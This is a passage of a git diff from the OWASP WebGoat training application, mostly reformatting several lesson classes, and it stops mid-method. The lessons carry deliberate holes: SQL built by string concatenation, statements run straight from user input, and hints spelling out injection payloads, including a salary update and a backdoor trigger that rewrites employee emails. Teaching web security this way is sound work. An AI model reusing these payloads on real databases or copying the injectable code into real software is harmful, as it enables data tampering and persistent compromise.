-	Html html = new Html();
-
-	Head head = new Head();
-	head.addElement(new Title(getLessonSolutionFileName()));
-
-	Body body = new Body();
-	body.addElement(new StringElement(src));
-
-	html.addElement(head);
-	html.addElement(body);
-
-	return src;
-    }
-
-    
-    /**
-     * Get the link that can be used to request this screen.
-     * 
-     * @return
-     */
-    public String getLink()
-    {
-	StringBuffer link = new StringBuffer();
-
-	link.append("attack?");
-	link.append(WebSession.SCREEN);
-	link.append("=");
-	link.append(getScreenId());
-	link.append("&");
-	link.append(WebSession.MENU);
-	link.append("=");
-	link.append(getCategory().getRanking());
-	return link.toString();
-    }
-
-
-    /**
-     * Get the link to the jsp page used to render this screen.
-     * 
-     * @return
-     */
-    public String getPage(WebSession s)
-    {
-	return null;
-    }
-
-
-    /**
-     * Get the link to the jsp template page used to render this screen.
-     * 
-     * @return
-     */
-    public String getTemplatePage(WebSession s)
-    {
-	return null;
-    }
-
-
-    public abstract String getCurrentAction(WebSession s);
-
-
-    public abstract void setCurrentAction(WebSession s, String lessonScreen);
-
-    /**
-     * Override this method to implement accesss control in a lesson.
-     * 
-     * @param s
-     * @param functionId
-     * @return
-     */
-    public boolean isAuthorized(WebSession s, int employeeId, String functionId)
-    {
-	return false;
-    }
-
-
-    /**
-     * Override this method to implement accesss control in a lesson.
-     * 
-     * @param s
-     * @param functionId
-     * @return
-     */
-    public boolean isAuthorized(WebSession s, String role, String functionId)
-    {
-	boolean authorized = false;
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param reader
+	 *            Description of the Parameter
+	 * @param numbers
+	 *            Description of the Parameter
+	 * @param methodName
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static Element readMethodFromFile(BufferedReader reader, String methodName, boolean numbers)
 	{
-	    String query = "SELECT * FROM auth WHERE role = '" + role
-		    + "' and functionid = '" + functionId + "'";
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		authorized = answer_results.first();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error authorizing");
-		sqle.printStackTrace();
-	    }
+		PRE pre = new PRE().addElement(getFileMethod(reader, methodName, numbers));
+
+		return (pre);
 	}
-	catch (Exception e)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void handleRequest(WebSession s)
 	{
-	    s.setMessage("Error authorizing");
-	    e.printStackTrace();
+		// call createContent first so messages will go somewhere
+
+		Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+
+		form.addElement(createContent(s));
+
+		setContent(form);
 	}
-	return authorized;
-    }
 
-
-    public int getUserId(WebSession s) throws ParameterNotFoundException
-    {
-	return -1;
-    }
-
-
-    public String getUserName(WebSession s) throws ParameterNotFoundException
-    {
-	return null;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param windowName
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public static String makeWindowScript(String windowName)
-    {
-	// FIXME: make this string static
-	StringBuffer script = new StringBuffer();
-	script.append("<script language=\"JavaScript\">\n");
-	script.append("	<!--\n");
-	script.append("	  function makeWindow(url) {\n");
-	script.append("\n");
-	script.append("	      agent = navigator.userAgent;\n");
-	script.append("\n");
-	script.append("	      params  = \"\";\n");
-	script.append("	      params += \"toolbar=0,\";\n");
-	script.append("	      params += \"location=0,\";\n");
-	script.append("	      params += \"directories=0,\";\n");
-	script.append("	      params += \"status=0,\";\n");
-	script.append("	      params += \"menubar=0,\";\n");
-	script.append("	      params += \"scrollbars=1,\";\n");
-	script.append("	      params += \"resizable=1,\";\n");
-	script.append("	      params += \"width=500,\";\n");
-	script.append("	      params += \"height=350\";\n");
-	script.append("\n");
-	script.append("		  // close the window to vary the window size\n");
-	script
-		.append("	   	  if (typeof(win) == \"object\" && !win.closed){\n");
-	script.append("            win.close();\n");
-	script.append("	      }\n");
-	script.append("\n");
-	script.append("	      win = window.open(url, '" + windowName
-		+ "' , params);\n");
-	script.append("\n");
-	script.append(" 		  // bring the window to the front\n");
-	script.append("		  win.focus();\n");
-	script.append("	  }\n");
-	script.append("	//-->\n");
-	script.append("	</script>\n");
-
-	return script.toString();
-    }
-
-
-    /**
-     * Simply reads a url into an Element for display. CAUTION: you might
-     * want to tinker with any non-https links (href)
-     * 
-     * @param url
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public static Element readFromURL(String url)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	public String getFormAction()
 	{
-	    URL u = new URL(url);
-	    HttpURLConnection huc = (HttpURLConnection) u.openConnection();
-	    BufferedReader reader = new BufferedReader(new InputStreamReader(
-		    huc.getInputStream()));
-	    String line;
-
-	    while ((line = reader.readLine()) != null)
-	    {
-		ec.addElement(new StringElement(line));
-	    }
-
-	    reader.close();
+		return getLink();
 	}
-	catch (Exception e)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public String toString()
 	{
-	    System.out.println(e);
-	    e.printStackTrace();
+		return getTitle();
 	}
 
-	return (ec);
-    }
+	public String getLessonPlanFileName()
+	{
+		return lessonPlanFileName;
+	}
 
+	public void setLessonPlanFileName(String lessonPlanFileName)
+	{
+		this.lessonPlanFileName = lessonPlanFileName;
+	}
 
-    /**
-     * Description of the Method
-     * 
-     * @param reader
-     *        Description of the Parameter
-     * @param numbers
-     *        Description of the Parameter
-     * @param methodName
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public static Element readMethodFromFile(BufferedReader reader,
-	    String methodName, boolean numbers)
-    {
-	PRE pre = new PRE().addElement(getFileMethod(reader, methodName,
-		numbers));
+	public String getLessonSolutionFileName()
+	{
+		return lessonSolutionFileName;
+	}
 
-	return (pre);
-    }
+	public void setLessonSolutionFileName(String lessonSolutionFileName)
+	{
+		this.lessonSolutionFileName = lessonSolutionFileName;
+	}
 
+	public String getSourceFileName()
+	{
+		return sourceFileName;
+	}
 
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *        Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-	// call createContent first so messages will go somewhere
+	public void setSourceFileName(String sourceFileName)
+	{
+		// System.out.println("Setting source file of lesson " + this + " to: "
+		// + sourceFileName);
+		this.sourceFileName = sourceFileName;
+	}
 
-	Form form = new Form(getFormAction(), Form.POST).setName("form")
-		.setEncType("");
-
-	form.addElement(createContent(s));
-
-	setContent(form);
-    }
-
-
-    public String getFormAction()
-    {
-	return getLink();
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
- 
-    public String toString()
-    {
-	return getTitle();
-    }
-
-
-    public String getLessonPlanFileName()
-    {
-	return lessonPlanFileName;
-    }
-
-
-    public void setLessonPlanFileName(String lessonPlanFileName)
-    {
-	this.lessonPlanFileName = lessonPlanFileName;
-    }
-
-    public String getLessonSolutionFileName()
-    {
-	return lessonSolutionFileName;
-    }
-
-
-    public void setLessonSolutionFileName(String lessonSolutionFileName)
-    {
-	this.lessonSolutionFileName = lessonSolutionFileName;
-    }
-
-    public String getSourceFileName()
-    {
-	return sourceFileName;
-    }
-
-
-    public void setSourceFileName(String sourceFileName)
-    {
-	// System.out.println("Setting source file of lesson " + this + " to: "
-	// + sourceFileName);
-	this.sourceFileName = sourceFileName;
-    }
-
-
-	public WebgoatContext getWebgoatContext() {
+	public WebgoatContext getWebgoatContext()
+	{
 		return webgoatContext;
 	}
 
-
-	public void setWebgoatContext(WebgoatContext webgoatContext) {
+	public void setWebgoatContext(WebgoatContext webgoatContext)
+	{
 		this.webgoatContext = webgoatContext;
 	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
index c13cbcc4a..7d38496a7 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -13,272 +13,264 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 
 public class AccessControlMatrix extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    private final static String RESOURCE = "Resource";
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    private final static String USER = "User";
+	private final static String RESOURCE = "Resource";
 
-    private final static String[] resources = { "Public Share",
-	    "Time Card Entry", "Performance Review", "Time Card Approval",
-	    "Site Manager", "Account Manager" };
+	private final static String USER = "User";
 
-    private final static String[] roles = { "Public", "User", "Manager",
-	    "Admin" };
+	private final static String[] resources = { "Public Share", "Time Card Entry", "Performance Review",
+			"Time Card Approval", "Site Manager", "Account Manager" };
 
-    private final static String[] users = { "Moe", "Larry", "Curly", "Shemp" };
+	private final static String[] roles = { "Public", "User", "Manager", "Admin" };
 
+	private final static String[] users = { "Moe", "Larry", "Curly", "Shemp" };
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		try
 		{
-		    String user = s.getParser().getRawParameter(USER, users[0]);
-		    String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
-		    String credentials = getRoles(user).toString();
-			
-		    Table t = new Table().setCellSpacing(0).setCellPadding(2)
-			.setBorder(0).setWidth("90%").setAlign("center");
+			String user = s.getParser().getRawParameter(USER, users[0]);
+			String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
+			String credentials = getRoles(user).toString();
 
-    		if (s.isColor())
-    		{
-    		    t.setBorder(1);
-    		}
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
-    		TR tr = new TR();
-		    tr.addElement(new TD().addElement("Change user:"));
-		    tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
-		    t.addElement(tr);
-	
-		    // These two lines would allow the user to select the resource from a  list
-		    // Didn't seem right to me so I made them type it in.
-		    //	ec.addElement( new P().addElement( "Choose a resource:" ) );
-		    //	ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
-    		tr = new TR();
-		    tr.addElement(new TD().addElement("Select resource: "));
-		    tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
-		    t.addElement(tr);
-	
-    		tr = new TR();
-		    tr.addElement(new TD("&nbsp;").setColSpan(2).setAlign("center"));
-		    t.addElement(tr);
-		    
-    		tr = new TR();
-		    tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
-		    t.addElement(tr);
-		    ec.addElement(t);
-		    
-		    if (isAllowed(user, resource))
-		    {
-			if (!getRoles(user).contains("Admin")
-				&& resource.equals("Account Manager"))
+			if (s.isColor())
 			{
-			    makeSuccess(s);
+				t.setBorder(1);
 			}
-			s.setMessage("User " + user + " " + credentials
-				+ " was allowed to access resource " + resource);
-		    }
-		    else
-		    {
-			s.setMessage("User " + user + " " + credentials
-				+ " did not have privilege to access resource "
-				+ resource);
-		    }
-		}
-		catch (Exception e)
+
+			TR tr = new TR();
+			tr.addElement(new TD().addElement("Change user:"));
+			tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
+			t.addElement(tr);
+
+			// These two lines would allow the user to select the resource from a list
+			// Didn't seem right to me so I made them type it in.
+			// ec.addElement( new P().addElement( "Choose a resource:" ) );
+			// ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
+			tr = new TR();
+			tr.addElement(new TD().addElement("Select resource: "));
+			tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD("&nbsp;").setColSpan(2).setAlign("center"));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
+			t.addElement(tr);
+			ec.addElement(t);
+
+			if (isAllowed(user, resource))
+			{
+				if (!getRoles(user).contains("Admin") && resource.equals("Account Manager"))
+				{
+					makeSuccess(s);
+				}
+				s.setMessage("User " + user + " " + credentials + " was allowed to access resource " + resource);
+			}
+			else
+			{
+				s.setMessage("User " + user + " " + credentials + " did not have privilege to access resource "
+						+ resource);
+			}
+		} catch (Exception e)
 		{
-		    s.setMessage("Error generating " + this.getClass().getName());
-		    e.printStackTrace();
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	
+
 		return (ec);
-    }
+	}
 
+	/**
+	 * Gets the category attribute of the RoleBasedAccessControl object
+	 * 
+	 * @return The category value
+	 */
 
-    /**
-     *  Gets the category attribute of the RoleBasedAccessControl object
-     *
-     * @return    The category value
-     */
+	protected Category getDefaultCategory()
+	{
+		return Category.ACCESS_CONTROL;
+	}
 
-    protected Category getDefaultCategory()
-    {
-    	return Category.ACCESS_CONTROL;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the RoleBasedAccessControl object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
+	/**
+	 * Gets the hints attribute of the RoleBasedAccessControl object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
 		hints.add("Many sites attempt to restrict access to resources by role.");
 		hints.add("Developers frequently make mistakes implementing this scheme.");
 		hints.add("Attempt combinations of users, roles, and resources.");
 		return hints;
-    }
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(10);
+	private final static Integer DEFAULT_RANKING = new Integer(10);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the resources attribute of the RoleBasedAccessControl object
-     *
-     * @param  rl  Description of the Parameter
-     * @return     The resources value
-     */
-    private List getResources(List rl)
-    {
+	/**
+	 * Gets the resources attribute of the RoleBasedAccessControl object
+	 * 
+	 * @param rl
+	 *            Description of the Parameter
+	 * @return The resources value
+	 */
+	private List getResources(List rl)
+	{
 		// return the resources allowed for these roles
 		ArrayList<String> list = new ArrayList<String>();
-	
+
 		if (rl.contains(roles[0]))
 		{
-		    list.add(resources[0]);
+			list.add(resources[0]);
 		}
-	
+
 		if (rl.contains(roles[1]))
 		{
-		    list.add(resources[1]);
-		    list.add(resources[5]);
+			list.add(resources[1]);
+			list.add(resources[5]);
 		}
-	
+
 		if (rl.contains(roles[2]))
 		{
-		    list.add(resources[2]);
-		    list.add(resources[3]);
+			list.add(resources[2]);
+			list.add(resources[3]);
 		}
-	
+
 		if (rl.contains(roles[3]))
 		{
-		    list.add(resources[4]);
-		    list.add(resources[5]);
+			list.add(resources[4]);
+			list.add(resources[5]);
 		}
-	
+
 		return list;
-    }
+	}
 
+	/**
+	 * Gets the role attribute of the RoleBasedAccessControl object
+	 * 
+	 * @param user
+	 *            Description of the Parameter
+	 * @return The role value
+	 */
 
-    /**
-     *  Gets the role attribute of the RoleBasedAccessControl object
-     *
-     * @param  user  Description of the Parameter
-     * @return       The role value
-     */
-
-    private List getRoles(String user)
-    {
+	private List getRoles(String user)
+	{
 		ArrayList<String> list = new ArrayList<String>();
-	
+
 		if (user.equals(users[0]))
 		{
-		    list.add(roles[0]);
+			list.add(roles[0]);
 		}
 		else if (user.equals(users[1]))
 		{
-		    list.add(roles[1]);
-		    list.add(roles[2]);
+			list.add(roles[1]);
+			list.add(roles[2]);
 		}
 		else if (user.equals(users[2]))
 		{
-		    list.add(roles[0]);
-		    list.add(roles[2]);
+			list.add(roles[0]);
+			list.add(roles[2]);
 		}
 		else if (user.equals(users[3]))
 		{
-		    list.add(roles[3]);
+			list.add(roles[3]);
 		}
-	
+
 		return list;
-    }
+	}
 
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
 
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-
-    public String getTitle()
-    {
+	public String getTitle()
+	{
 		return ("Using an Access Control Matrix");
-    }
+	}
 
+	// private final static ArrayList userList = new ArrayList(Arrays.asList(users));
+	// private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
+	// private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
 
-    // private final static ArrayList userList = new ArrayList(Arrays.asList(users));
-    // private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
-    // private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
+	/**
+	 * Please do not ever implement an access control scheme this way! But it's not the worst I've
+	 * seen.
+	 * 
+	 * @param user
+	 *            Description of the Parameter
+	 * @param resource
+	 *            Description of the Parameter
+	 * @return The allowed value
+	 */
 
-    /**
-     *  Please do not ever implement an access control scheme this way! But it's not the worst I've
-     *  seen.
-     *
-     * @param  user      Description of the Parameter
-     * @param  resource  Description of the Parameter
-     * @return           The allowed value
-     */
-
-    private boolean isAllowed(String user, String resource)
-    {
+	private boolean isAllowed(String user, String resource)
+	{
 		List roles = getRoles(user);
 		List resources = getResources(roles);
 		return (resources.contains(resource));
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
index 120dc556e..54a4be525 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -6,7 +7,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -22,37 +22,35 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian
- *         Technologies.</a>
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
  */
 public class BackDoors extends SequentialLessonAdapter
 {
@@ -63,8 +61,8 @@ public class BackDoors extends SequentialLessonAdapter
 
 	private final static String SELECT_ST = "select userid, password, ssn, salary, email from employee where userid=";
 
-	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-			"Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
 	protected Element createContent(WebSession s)
 	{
@@ -96,13 +94,14 @@ public class BackDoors extends SequentialLessonAdapter
 				String[] arrSQL = userInput.split(";");
 				Connection conn = DatabaseUtilities.getConnection(s);
 				Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-						ResultSet.CONCUR_READ_ONLY);
+															ResultSet.CONCUR_READ_ONLY);
 				if (arrSQL.length == 2)
 				{
 					statement.executeUpdate(arrSQL[1]);
 
 					getLessonTracker(s).setStage(2);
-					s.setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
+					s
+							.setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
 				}
 
 				ResultSet rs = statement.executeQuery(arrSQL[0]);
@@ -129,8 +128,7 @@ public class BackDoors extends SequentialLessonAdapter
 					ec.addElement(t);
 				}
 			}
-		}
-		catch (Exception ex)
+		} catch (Exception ex)
 		{
 			ec.addElement(new PRE(ex.getMessage()));
 		}
@@ -176,12 +174,10 @@ public class BackDoors extends SequentialLessonAdapter
 							+ " statements. The first is the system's while the second is totally yours.";
 					instructions = instructions
 							+ " Your account ID is 101. This page allows you to see your password, ssn and salary.";
-					instructions = instructions
-							+ "  Try to inject another update to update salary to something higher";
+					instructions = instructions + "  Try to inject another update to update salary to something higher";
 					break;
 				case 2:
-					instructions = "Stage " + getStage(s)
-							+ ": Use String SQL Injection to inject a backdoor. ";
+					instructions = "Stage " + getStage(s) + ": Use String SQL Injection to inject a backdoor. ";
 					instructions = instructions
 							+ " The second stage of this lesson is to teach you how to use a vulneable fields to inject the DB work or the backdoor.";
 					instructions = instructions
@@ -248,8 +244,8 @@ public class BackDoors extends SequentialLessonAdapter
 		hints.add("Your user id is 101. Use it to see your information");
 		hints.add("A semi-colon usually ends a SQL statement and starts a new one.");
 		hints.add("Try this 101 or 1=1; update employee set salary=100000");
-		hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON " +
-				"employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
+		hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON "
+				+ "employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
 		return hints;
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
index a7c17a555..f7ba35023 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -14,318 +14,281 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class BasicAuthentication extends SequentialLessonAdapter
 {
-    private static final String EMPTY_STRING = "";
+	private static final String EMPTY_STRING = "";
 
-    private static final String WEBGOAT_BASIC = "webgoat_basic";
+	private static final String WEBGOAT_BASIC = "webgoat_basic";
 
-    private static final String AUTHORIZATION = "Authorization";
+	private static final String AUTHORIZATION = "Authorization";
 
-    private static final String ORIGINAL_AUTH = "Original_Auth";
+	private static final String ORIGINAL_AUTH = "Original_Auth";
 
-    private static final String ORIGINAL_USER = "Original.user";
+	private static final String ORIGINAL_USER = "Original.user";
 
-    private static final String BASIC = "basic";
+	private static final String BASIC = "basic";
 
-    private static final String JSESSIONID = "JSESSIONID";
+	private static final String JSESSIONID = "JSESSIONID";
 
-    private final static String HEADER_NAME = "header";
+	private final static String HEADER_NAME = "header";
 
-    private final static String HEADER_VALUE = "value";
+	private final static String HEADER_VALUE = "value";
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	return super.createStagedContent(s);
-    }
-
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-
-	String headerName = null;
-	String headerValue = null;
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    headerName = new String(s.getParser().getStringParameter(
